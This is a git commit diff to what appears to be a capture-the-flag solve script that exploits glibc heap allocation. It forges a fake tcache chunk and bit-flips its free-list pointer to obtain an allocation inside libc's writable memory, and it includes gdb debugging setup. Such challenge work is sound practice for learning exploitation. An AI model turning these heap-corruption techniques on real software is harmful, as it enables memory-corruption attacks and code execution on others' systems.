commit b7fd983ed9bb424d6cdf40fe580e993119f1ae7e
parent dc05f4908638926f508fe86e5e483480621f5119
Author: Louis Burda <quent.burda@gmail.com>
Date: Fri, 26 Apr 2024 02:37:17 +0200
Save tech
Diffstat:
2 files changed, 17 insertions(+), 10 deletions(-)
diff --git a/solve/glibc b/solve/glibc
@@ -0,0 +1 @@
+/home/snx/ext/glibc
+\ No newline at end of file
diff --git a/solve/solve b/solve/solve
@@ -60,7 +60,7 @@ def adj(size):
def mmap_adj(size):
return size - 2 - 0x1000 # page aligned malloc header
-gdb = 'gdb -ex "set debug-file-directory $PWD/debug"' \
+gdb = 'gdb -ex "set debug-file-directory $PWD/debug" -ex "dir glibc"' \
+ ' -ex "target remote localhost:1025" -ex "b main" -ex "continue"'
run_in_new_terminal(["sh", "-c", f'sleep 1; sudo -E {gdb}'], kill_at_exit=False)
@@ -76,12 +76,12 @@ print("MMAP2", hex(mmap_size_2))
print("MMAP3", hex(mmap_size_3))
# Do some alignment for later.
-_ = alloc(cc() * mmap_size_2)
-_ = alloc(cc() * mmap_size_2)
+_ = alloc(cc() * mmap_adj(mmap_size_1))
+_ = alloc(cc() * mmap_adj(mmap_size_2))
# Prepare a tcache-able chunk for later.
-bin_size = 0x50
-top = alloc(adj(bin_size))
+bin_size = 0x80
+top = alloc(cc() * adj(bin_size))
# Add a padding chunk to prevent bad unmapping.
_ = alloc(cc() * mmap_adj(mmap_size_1)) # Slightly smaller to bypass malloc.c:3376
@@ -105,7 +105,7 @@ assert(mmap_size_3 > mmap_size_1 ^ flip_size)
# We pretend front chunk is a small, non-mmaped tcache-able chunk.
data = cc() * mmap_adj(mmap_size_3)
offset = mmap_size_3 - flip_size
-back = alloc(data[:offset-8] + p64(bin_size ^ 0b1) + data[offset:])
+back = alloc(data[:offset-8] + p64(bin_size^0b1) + data[offset:])
io.interactive()
@@ -115,14 +115,19 @@ free(front)
# Free another chunk into same tcache.
free(top)
+io.interactive()
+
# Now the fd pointer of 'top' chunk is the fake chunk near libc.
# We use our second bit flip to make it point into libc.
-flip(top, -8, 0x400000)
+flipv(top, 0, 0x400000)
+
+io.interactive()
-# we can flip a bit through the protected address to redirect it
-# into the libc writable region (this is what the alignment is for)
+# Pop top chunk from bin.
+top = alloc(cc() * adj(bin_size))
-# allocate the buffer in libc and write to set size
+# Allocate the buffer in libc.
+libc = alloc(cc() * adj(bin_size))
# use edit to fixup the data
